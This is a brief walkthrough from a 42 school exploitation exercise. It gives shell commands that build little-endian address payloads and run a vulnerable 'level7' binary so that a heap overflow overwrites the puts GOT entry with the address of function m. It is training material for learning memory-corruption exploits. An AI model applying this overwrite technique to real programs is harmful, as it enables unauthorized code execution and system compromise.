# **************************************************************************** #
#                                                                              #
#                                                         :::      ::::::::    #
#    walkthrough                                        :+:      :+:    :+:    #
#                                                     +:+ +:+         +:+      #
#    By: lgarczyn <lgarczyn@student.42.fr>          +#+  +:+       +#+         #
#                                                 +#+#+#+#+#+   +#+            #
#    Created: 2019/05/04 18:52:32 by lgarczyn          #+#    #+#              #
#    Updated: 2019/05/04 18:52:55 by lgarczyn         ###   ########.fr        #
#                                                                              #
# **************************************************************************** #


export A=`echo -e "\x54\x84\x04\x08"`
export B=`echo -e "\x54\x84\x04\x08"`

A = where I want to write => 0x8049928 (puts plt)
B = what I want to write => 0x080484f4 (m)


export A=`echo -e "\x28\x99\x04\x08"`
export B=`echo -e "\xf4\x84\x04\x08"`

./level7 11111111111111111111$A $B